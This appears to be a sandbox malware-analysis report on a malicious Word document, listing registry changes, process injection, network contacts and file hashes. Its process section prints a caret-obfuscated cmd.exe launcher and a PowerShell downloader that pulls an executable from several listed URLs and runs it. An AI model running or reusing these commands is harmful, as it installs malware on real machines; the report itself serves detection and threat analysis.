Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 2964 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 1664 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\SysWOW64\cmd.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1664 wrote to memory of 2292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\cmd.exe

cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ 
^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.fairfundskenya.com udp
US 8.8.8.8:53 www.trainifique.ro udp
US 185.199.111.153:80 www.trainifique.ro tcp
US 8.8.8.8:53 trainifique.ro udp
US 185.199.110.153:443 trainifique.ro tcp
US 185.199.110.153:443 trainifique.ro tcp
US 8.8.8.8:53 www.photostand.de udp
DE 81.169.145.165:80 www.photostand.de tcp
DE 81.169.145.165:443 www.photostand.de tcp
DE 81.169.145.165:443 www.photostand.de tcp
US 8.8.8.8:53 abdullahsheikh.info udp
US 8.8.8.8:53 lamsanviet.com udp
IN 193.203.163.237:80 lamsanviet.com tcp
IN 193.203.163.237:443 lamsanviet.com tcp
IN 193.203.163.237:443 lamsanviet.com tcp

Files

memory/2852-0-0x000000002FF41000-0x000000002FF42000-memory.dmp

memory/2852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2852-2-0x000000007126D000-0x0000000071278000-memory.dmp

memory/2852-7-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-19-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-18-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-124-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-112-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-100-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-87-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-75-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-62-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-31-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-27-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-17-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-15-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-14-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-13-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-12-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-11-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-10-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-9-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-6-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-131-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-59-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-51-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-16-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-8-0x00000000007E0000-0x00000000008E0000-memory.dmp

memory/2852-139-0x000000007126D000-0x0000000071278000-memory.dmp

memory/2852-140-0x00000000007E0000-0x00000000008E0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 f12a471b7b2639f1e13bc02a74e8c0ac
SHA1 ec0fbd1646708eb37027cdf4fa6dc04143f4a6e0
SHA256 90766f139ea4a8e9d5cdd7f9dd028eb7cf88cb8fb755f5e6da57dd06281c1380
SHA512 d7c98e22377ab96be371f5a162c2ab35afc153f3651b8534c1f618b9bcbdcb7e7da0cce94545f8262d68ab70c163769ec2d6ff69ffd7585da1655944c876e901

memory/2852-156-0x000000007126D000-0x0000000071278000-memory.dmp